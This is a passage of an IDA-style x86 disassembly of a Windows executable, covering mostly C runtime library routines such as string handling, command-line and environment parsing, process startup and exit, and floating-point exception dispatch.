pop ebx
pop edi
mov al, dl
jmp sub_402996
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_402600+49�j
; sub_402600+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40267A: ; CODE XREF: sub_402600+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_402600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: StartAddress+103�p
; StartAddress+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402699: ; CODE XREF: sub_402680+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402699
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4026C1
mov edx, dword_406F3C
loc_4026C1: ; CODE XREF: sub_402680+39�j
; sub_402680+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4026E1
test al, al
jz short loc_4026E1
inc edx
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026E1: ; CODE XREF: sub_402680+58�j
; sub_402680+5C�j
mov ebx, edx
loc_4026E3: ; CODE XREF: sub_402680+81�j
mov al, [edx]
test al, al
jz short loc_402707
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_402703
inc edx
jmp short loc_4026E3
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402680+7E�j
and byte ptr [edx], 0
inc edx
loc_402707: ; CODE XREF: sub_402680+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_406F3C, edx
and eax, ebx
pop ebx
leave
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: StartAddress+E9�p
; StartAddress+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402791
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_401EF0+108�p
; sub_401EF0+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40274C
loc_40273D: ; CODE XREF: sub_402730+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40277F
test ecx, 3
jnz short loc_40273D
loc_40274C: ; CODE XREF: sub_402730+B�j
; sub_402730+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40274C
mov eax, [ecx-4]
test al, al
jz short loc_40278E
test ah, ah
jz short loc_402789
test eax, 0FF0000h
jz short loc_402784
test eax, 0FF000000h
jz short loc_40277F
jmp short loc_40274C
; ---------------------------------------------------------------------------
loc_40277F: ; CODE XREF: sub_402730+12�j
; sub_402730+4B�j
lea edi, [ecx-1]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402784: ; CODE XREF: sub_402730+44�j
lea edi, [ecx-2]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_402789: ; CODE XREF: sub_402730+3D�j
lea edi, [ecx-3]
jmp short loc_402791
; ---------------------------------------------------------------------------
loc_40278E: ; CODE XREF: sub_402730+39�j
lea edi, [ecx-4]
loc_402791: ; CODE XREF: sub_402720+5�j
; sub_402730+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4027B6
loc_40279D: ; CODE XREF: sub_402730+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_402808
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40279D
jmp short loc_4027B6
; ---------------------------------------------------------------------------
loc_4027B1: ; CODE XREF: sub_402730+9E�j
; sub_402730+B8�j
mov [edi], edx
add edi, 4
loc_4027B6: ; CODE XREF: sub_402730+6B�j
; sub_402730+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4027B1
test dl, dl
jz short loc_402808
test dh, dh
jz short loc_4027FF
test edx, 0FF0000h
jz short loc_4027F2
test edx, 0FF000000h
jz short loc_4027EA
jmp short loc_4027B1
; ---------------------------------------------------------------------------
loc_4027EA: ; CODE XREF: sub_402730+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027F2: ; CODE XREF: sub_402730+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_4027FF: ; CODE XREF: sub_402730+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402808: ; CODE XREF: sub_402730+72�j
; sub_402730+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402730 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402810(WORD CharType)
sub_402810 proc near ; CODE XREF: sub_401E30+19�p
CharType = word ptr 4
cmp dword_406CEC, 1
jle short loc_40282A
push 107h ; int
push dword ptr [esp+4+CharType] ; CharType
call sub_402A4C
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40282A: ; CODE XREF: sub_402810+7�j
mov eax, dword ptr [esp+CharType]
mov ecx, off_406AE0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_402810 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405128
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call GetVersion ; GetVersion
xor edx, edx
mov dl, ah
mov dword_406F64, edx
mov ecx, eax
and ecx, 0FFh
mov dword_406F60, ecx
shl ecx, 8
add ecx, edx
mov dword_406F5C, ecx
shr eax, 10h
mov dword_406F58, eax
xor esi, esi
push esi
call sub_403382
pop ecx
test eax, eax
jnz short loc_4028AA
push 1Ch
call sub_402959
; ---------------------------------------------------------------------------
db 59h ; Y
; ---------------------------------------------------------------------------
loc_4028AA: ; CODE XREF: .text:004028A0�j
mov [ebp-4], esi
call sub_4031D7
call GetCommandLineA ; GetCommandLineA
mov dword_407458, eax
call sub_4030A5
mov dword_406F40, eax
call sub_402E58
call sub_402D9F
call sub_402AC1
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call GetStartupInfoA ; GetStartupInfoA
call sub_402D47
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_4028F7
movzx eax, word ptr [ebp-2Ch]
jmp short loc_4028FA
; ---------------------------------------------------------------------------
loc_4028F7: ; CODE XREF: .text:004028EF�j
push 0Ah
pop eax
loc_4028FA: ; CODE XREF: .text:004028F5�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call GetModuleHandleA ; GetModuleHandleA
push eax
call sub_402029
mov [ebp-60h], eax
push eax
call sub_402AEE
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_402BC3
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402AFF
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402934(DWORD NumberOfBytesWritten)
sub_402934 proc near ; CODE XREF: sub_402D9F+4E�p
; sub_402D9F+7D�p ...
NumberOfBytesWritten= dword ptr 4
cmp dword_406F48, 1
jnz short loc_402942
call sub_403590
loc_402942: ; CODE XREF: sub_402934+7�j
push [esp+NumberOfBytesWritten] ; NumberOfBytesWritten
call sub_4035C9
push 0FFh ; uExitCode
call off_406AD0
pop ecx
pop ecx
retn
sub_402934 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; int __cdecl sub_402959(DWORD NumberOfBytesWritten)
sub_402959 proc near ; CODE XREF: .text:004028A4�p
NumberOfBytesWritten= dword ptr 4
cmp dword_406F48, 1
jnz short loc_402967
call sub_403590
loc_402967: ; CODE XREF: sub_402959+7�j
push [esp+NumberOfBytesWritten] ; NumberOfBytesWritten
call sub_4035C9
pop ecx
push 0FFh ; uExitCode
call ExitProcess ; ExitProcess
sub_402959 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402996
loc_402980: ; CODE XREF: sub_402996+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402996
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402996 proc near ; CODE XREF: sub_402600+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402980 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4029BB
loc_4029A8: ; CODE XREF: sub_402996+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402980
test cl, cl
jz short loc_402A04
test edx, 3
jnz short loc_4029A8
loc_4029BB: ; CODE XREF: sub_402996+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4029C6: ; CODE XREF: sub_402996+5B�j
; sub_402996+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402A08
and eax, 81010100h
jz short loc_4029C6
and eax, 1010100h
jnz short loc_402A02
and esi, 80000000h
jnz short loc_4029C6
loc_402A02: ; CODE XREF: sub_402996+62�j
; sub_402996+7B�j ...
pop esi
pop edi
loc_402A04: ; CODE XREF: sub_402996+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402A08: ; CODE XREF: sub_402996+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402A45
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A3E
test ah, ah
jz short loc_402A02
shr eax, 10h
cmp al, bl
jz short loc_402A37
test al, al
jz short loc_402A02
cmp ah, bl
jz short loc_402A30
test ah, ah
jz short loc_402A02
jmp short loc_4029C6
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_402996+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A37: ; CODE XREF: sub_402996+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A3E: ; CODE XREF: sub_402996+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402A45: ; CODE XREF: sub_402996+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402996 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402A4C(WORD CharType, int)
sub_402A4C proc near ; CODE XREF: sub_402810+12�p
MultiByteStr = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
CharType = word ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, dword ptr [ebp+CharType]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402A6A
mov ecx, off_406AE0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402ABC
; ---------------------------------------------------------------------------
loc_402A6A: ; CODE XREF: sub_402A4C+10�j
mov ecx, eax
push esi
mov esi, off_406AE0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402A8F
and [ebp+var_2], 0
mov [ebp+MultiByteStr], cl
mov [ebp+var_3], al
push 2
jmp short loc_402A98
; ---------------------------------------------------------------------------
loc_402A8F: ; CODE XREF: sub_402A4C+33�j
and [ebp+var_3], 0
mov [ebp+MultiByteStr], al
push 1
loc_402A98: ; CODE XREF: sub_402A4C+41�j
pop eax
lea ecx, [ebp+0Ah]
push 1 ; int
push 0 ; Locale
push 0 ; CodePage
push ecx ; lpCharType
push eax ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 1 ; dwInfoType
call sub_40371C
add esp, 1Ch
test eax, eax
jnz short loc_402AB8
leave
retn
; ---------------------------------------------------------------------------
loc_402AB8: ; CODE XREF: sub_402A4C+68�j
movzx eax, word ptr [ebp+0Ah]
loc_402ABC: ; CODE XREF: sub_402A4C+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402A4C endp
; =============== S U B R O U T I N E =======================================
sub_402AC1 proc near ; CODE XREF: .text:004028D1�p
mov eax, dword_407454
test eax, eax
jz short loc_402ACC
call eax ; dword_407454
loc_402ACC: ; CODE XREF: sub_402AC1+7�j
push offset dword_406010
push offset dword_406008
call sub_402BA9
push offset dword_406004
push offset dword_406000
call sub_402BA9
add esp, 10h
retn
sub_402AC1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402AEE(UINT uExitCode)
sub_402AEE proc near ; CODE XREF: .text:00402910�p
uExitCode = dword ptr 4
push 0 ; int
push 0 ; int
push [esp+8+uExitCode] ; uExitCode
call sub_402B10
add esp, 0Ch
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402AFF(UINT uExitCode)
sub_402AFF proc near ; CODE XREF: .text:0040292F�p
; sub_402934+1C�p
; DATA XREF: ...
uExitCode = dword ptr 4
push 0 ; int
push 1 ; int
push [esp+8+uExitCode] ; uExitCode
call sub_402B10
add esp, 0Ch
retn
sub_402AFF endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_402B10(UINT uExitCode, int, int)
sub_402B10 proc near ; CODE XREF: sub_402AEE+8�p
; sub_402AFF+8�p
uExitCode = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_406F94, edi
jnz short loc_402B2D
push [esp+4+uExitCode] ; uExitCode
call GetCurrentProcess ; GetCurrentProcess
push eax ; hProcess
call TerminateProcess ; TerminateProcess
loc_402B2D: ; CODE XREF: sub_402B10+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_406F90, edi
mov byte_406F8C, bl
jnz short loc_402B81
mov eax, dword_407450
test eax, eax
jz short loc_402B70
mov ecx, dword_40744C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402B6F
loc_402B5C: ; CODE XREF: sub_402B10+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402B64
call eax
loc_402B64: ; CODE XREF: sub_402B10+50�j
sub esi, 4
cmp esi, dword_407450
jnb short loc_402B5C
loc_402B6F: ; CODE XREF: sub_402B10+4A�j
pop esi
loc_402B70: ; CODE XREF: sub_402B10+3C�j
push offset dword_406018
push offset dword_406014
call sub_402BA9
pop ecx
pop ecx
loc_402B81: ; CODE XREF: sub_402B10+33�j
push offset dword_406020
push offset dword_40601C
call sub_402BA9
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402BA7
push [esp+4+uExitCode] ; uExitCode
mov dword_406F94, edi
call ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_402BA7: ; CODE XREF: sub_402B10+85�j
pop edi
retn
sub_402B10 endp
; =============== S U B R O U T I N E =======================================
sub_402BA9 proc near ; CODE XREF: sub_402AC1+15�p
; sub_402AC1+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402BAE: ; CODE XREF: sub_402BA9+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402BC1
mov eax, [esi]
test eax, eax
jz short loc_402BBC
call eax
loc_402BBC: ; CODE XREF: sub_402BA9+F�j
add esi, 4
jmp short loc_402BAE
; ---------------------------------------------------------------------------
loc_402BC1: ; CODE XREF: sub_402BA9+9�j
pop esi
retn
sub_402BA9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_402BC3(int, struct _EXCEPTION_POINTERS *ExceptionInfo)
sub_402BC3 proc near ; CODE XREF: .text:00402921�p
arg_0 = dword ptr 8
ExceptionInfo = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402D04
test eax, eax
pop ecx
jz loc_402CF8
mov ebx, [eax+8]
test ebx, ebx
jz loc_402CF8
cmp ebx, 5
jnz short loc_402BF4
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402D01
; ---------------------------------------------------------------------------
loc_402BF4: ; CODE XREF: sub_402BC3+23�j
cmp ebx, 1
jz loc_402CF3
mov ecx, dword_406F98
mov [ebp+arg_0], ecx
mov ecx, [ebp+ExceptionInfo]
mov dword_406F98, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402CE3
mov ecx, dword_406D70
mov edx, dword_406D74
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402C43
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D00h[esi*4]
loc_402C3A: ; CODE XREF: sub_402BC3+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402C3A
loc_402C43: ; CODE XREF: sub_402BC3+69�j
mov eax, [eax]
mov esi, dword_406D7C
cmp eax, 0C000008Eh
jnz short loc_402C5E
mov dword_406D7C, 83h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C5E: ; CODE XREF: sub_402BC3+8D�j
cmp eax, 0C0000090h
jnz short loc_402C71
mov dword_406D7C, 81h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C71: ; CODE XREF: sub_402BC3+A0�j
cmp eax, 0C0000091h
jnz short loc_402C84
mov dword_406D7C, 84h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C84: ; CODE XREF: sub_402BC3+B3�j
cmp eax, 0C0000093h
jnz short loc_402C97
mov dword_406D7C, 85h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402C97: ; CODE XREF: sub_402BC3+C6�j
cmp eax, 0C000008Dh
jnz short loc_402CAA
mov dword_406D7C, 82h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CAA: ; CODE XREF: sub_402BC3+D9�j
cmp eax, 0C000008Fh
jnz short loc_402CBD
mov dword_406D7C, 86h
jmp short loc_402CCE
; ---------------------------------------------------------------------------
loc_402CBD: ; CODE XREF: sub_402BC3+EC�j
cmp eax, 0C0000092h
jnz short loc_402CCE
mov dword_406D7C, 8Ah
loc_402CCE: ; CODE XREF: sub_402BC3+99�j
; sub_402BC3+AC�j ...
push dword_406D7C
push 8
call ebx
pop ecx
mov dword_406D7C, esi
pop ecx
pop esi
jmp short loc_402CEB
; ---------------------------------------------------------------------------
loc_402CE3: ; CODE XREF: sub_402BC3+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_402CEB: ; CODE XREF: sub_402BC3+11E�j
mov eax, [ebp+arg_0]
mov dword_406F98, eax
loc_402CF3: ; CODE XREF: sub_402BC3+34�j
or eax, 0FFFFFFFFh
jmp short loc_402D01
; ---------------------------------------------------------------------------
loc_402CF8: ; CODE XREF: sub_402BC3+F�j
; sub_402BC3+1A�j
push [ebp+ExceptionInfo] ; ExceptionInfo
call UnhandledExceptionFilter ; UnhandledExceptionFilter
loc_402D01: ; CODE XREF: sub_402BC3+2C�j
; sub_402BC3+133�j
pop ebx
pop ebp
retn
sub_402BC3 endp
; =============== S U B R O U T I N E =======================================
sub_402D04 proc near ; CODE XREF: sub_402BC3+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_406D78
cmp dword_406CF8, edx
push esi
mov eax, offset dword_406CF8
jz short loc_402D31
lea esi, [ecx+ecx*2]
lea esi, ds:406CF8h[esi*4]
loc_402D26: ; CODE XREF: sub_402D04+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402D31
cmp [eax], edx
jnz short loc_402D26
loc_402D31: ; CODE XREF: sub_402D04+16�j
; sub_402D04+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406CF8h[ecx*4]
cmp eax, ecx
jnb short loc_402D44
cmp [eax], edx
jz short locret_402D46
loc_402D44: ; CODE XREF: sub_402D04+3A�j
xor eax, eax
locret_402D46: ; CODE XREF: sub_402D04+3E�j
retn
sub_402D04 endp
; =============== S U B R O U T I N E =======================================
sub_402D47 proc near ; CODE XREF: .text:004028E3�p
cmp dword_407448, 0
jnz short loc_402D55
call sub_403C6B
loc_402D55: ; CODE XREF: sub_402D47+7�j
push esi
mov esi, dword_407458
mov al, [esi]
cmp al, 22h
jnz short loc_402D87
loc_402D62: ; CODE XREF: sub_402D47+33�j
; sub_402D47+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402D7F
test al, al
jz short loc_402D7F
movzx eax, al
push eax
call sub_403865
test eax, eax
pop ecx
jz short loc_402D62
inc esi
jmp short loc_402D62
; ---------------------------------------------------------------------------
loc_402D7F: ; CODE XREF: sub_402D47+21�j
; sub_402D47+25�j
cmp byte ptr [esi], 22h
jnz short loc_402D91
loc_402D84: ; CODE XREF: sub_402D47+52�j
inc esi
jmp short loc_402D91
; ---------------------------------------------------------------------------
loc_402D87: ; CODE XREF: sub_402D47+19�j
cmp al, 20h
jbe short loc_402D91
loc_402D8B: ; CODE XREF: sub_402D47+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402D8B
loc_402D91: ; CODE XREF: sub_402D47+3B�j
; sub_402D47+3E�j ...
mov al, [esi]
test al, al
jz short loc_402D9B
cmp al, 20h
jbe short loc_402D84
loc_402D9B: ; CODE XREF: sub_402D47+4E�j
mov eax, esi
pop esi
retn
sub_402D47 endp
; =============== S U B R O U T I N E =======================================
sub_402D9F proc near ; CODE XREF: .text:004028CC�p
push ebx
xor ebx, ebx
cmp dword_407448, ebx
push esi
push edi
jnz short loc_402DB1
call sub_403C6B
loc_402DB1: ; CODE XREF: sub_402D9F+B�j
mov esi, dword_406F40
xor edi, edi
loc_402DB9: ; CODE XREF: sub_402D9F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402DD1
cmp al, 3Dh
jz short loc_402DC4
inc edi
loc_402DC4: ; CODE XREF: sub_402D9F+22�j
push esi
call sub_402210
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402DB9
; ---------------------------------------------------------------------------
loc_402DD1: ; CODE XREF: sub_402D9F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403CB6
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_406F74, esi
jnz short loc_402DF3
push 9 ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_402DF3: ; CODE XREF: sub_402D9F+4A�j
mov edi, dword_406F40
cmp [edi], bl
jz short loc_402E36
push ebp
loc_402DFE: ; CODE XREF: sub_402D9F+94�j
push edi
call sub_402210
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402E2F
push ebp
call sub_403CB6
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402E22
push 9 ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_402E22: ; CODE XREF: sub_402D9F+79�j
push edi
push dword ptr [esi]
call sub_402720
pop ecx
add esi, 4
pop ecx
loc_402E2F: ; CODE XREF: sub_402D9F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402DFE
pop ebp
loc_402E36: ; CODE XREF: sub_402D9F+5C�j
push dword_406F40
call sub_403C87
pop ecx
mov dword_406F40, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_407444, 1
pop ebx
retn
sub_402D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E58 proc near ; CODE XREF: .text:004028C7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_407448, ebx
push esi
push edi
jnz short loc_402E6F
call sub_403C6B
loc_402E6F: ; CODE XREF: sub_402E58+10�j
mov esi, offset Filename ; "C:\\Documents and Settings\\Vernier Image"...
push 104h ; nSize
push esi ; lpFilename
push ebx ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
mov eax, dword_407458
mov off_406F84, esi
mov edi, esi
cmp [eax], bl
jz short loc_402E94
mov edi, eax
loc_402E94: ; CODE XREF: sub_402E58+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402EF1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403CB6
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402EC4
push 8 ; NumberOfBytesWritten
call sub_402934
pop ecx
loc_402EC4: ; CODE XREF: sub_402E58+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402EF1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_406F6C, esi
pop edi
pop esi
mov dword_406F68, eax
pop ebx
leave
retn
sub_402E58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF1 proc near ; CODE XREF: sub_402E58+47�p
; sub_402E58+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402F1B
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402F1B: ; CODE XREF: sub_402EF1+20�j
cmp byte ptr [eax], 22h
jnz short loc_402F64
loc_402F20: ; CODE XREF: sub_402EF1+58�j
; sub_402EF1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402F52
test dl, dl
jz short loc_402F52
movzx edx, dl
test byte_407221[edx], 4
jz short loc_402F45
inc dword ptr [ecx]
test esi, esi
jz short loc_402F45
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402F45: ; CODE XREF: sub_402EF1+46�j
; sub_402EF1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F20
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402F20
; ---------------------------------------------------------------------------
loc_402F52: ; CODE XREF: sub_402EF1+36�j
; sub_402EF1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F5C
and byte ptr [esi], 0
inc esi
loc_402F5C: ; CODE XREF: sub_402EF1+65�j
cmp byte ptr [eax], 22h
jnz short loc_402FA7
inc eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F64: ; CODE XREF: sub_402EF1+2D�j
; sub_402EF1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402F6F
mov dl, [eax]
mov [esi], dl
inc esi
loc_402F6F: ; CODE XREF: sub_402EF1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_407221[ebx], 4
jz short loc_402F8A
inc dword ptr [ecx]
test esi, esi
jz short loc_402F89
mov bl, [eax]
mov [esi], bl
inc esi
loc_402F89: ; CODE XREF: sub_402EF1+91�j
inc eax
loc_402F8A: ; CODE XREF: sub_402EF1+8B�j
; DATA XREF: .rsrc:0040B98B�o
cmp dl, 20h
jz short loc_402F98
test dl, dl
jz short loc_402F9C
cmp dl, 9
jnz short loc_402F64
loc_402F98: ; CODE XREF: sub_402EF1+9C�j
test dl, dl
jnz short loc_402F9F
loc_402F9C: ; CODE XREF: sub_402EF1+A0�j
dec eax
jmp short loc_402FA7
; ---------------------------------------------------------------------------
loc_402F9F: ; CODE XREF: sub_402EF1+A9�j
test esi, esi
jz short loc_402FA7
and byte ptr [esi-1], 0
loc_402FA7: ; CODE XREF: sub_402EF1+6E�j
; sub_402EF1+71�j ...
and [ebp+arg_10], 0
loc_402FAB: ; CODE XREF: sub_402EF1+19E�j
cmp byte ptr [eax], 0
jz loc_403094
loc_402FB4: ; CODE XREF: sub_402EF1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_402FC0
cmp dl, 9
jnz short loc_402FC3
loc_402FC0: ; CODE XREF: sub_402EF1+C8�j
inc eax
jmp short loc_402FB4
; ---------------------------------------------------------------------------
loc_402FC3: ; CODE XREF: sub_402EF1+CD�j
cmp byte ptr [eax], 0
jz loc_403094
test edi, edi
jz short loc_402FD8
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FD8: ; CODE XREF: sub_402EF1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_402FDD: ; CODE XREF: sub_402EF1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_402FE6: ; CODE XREF: sub_402EF1+FC�j
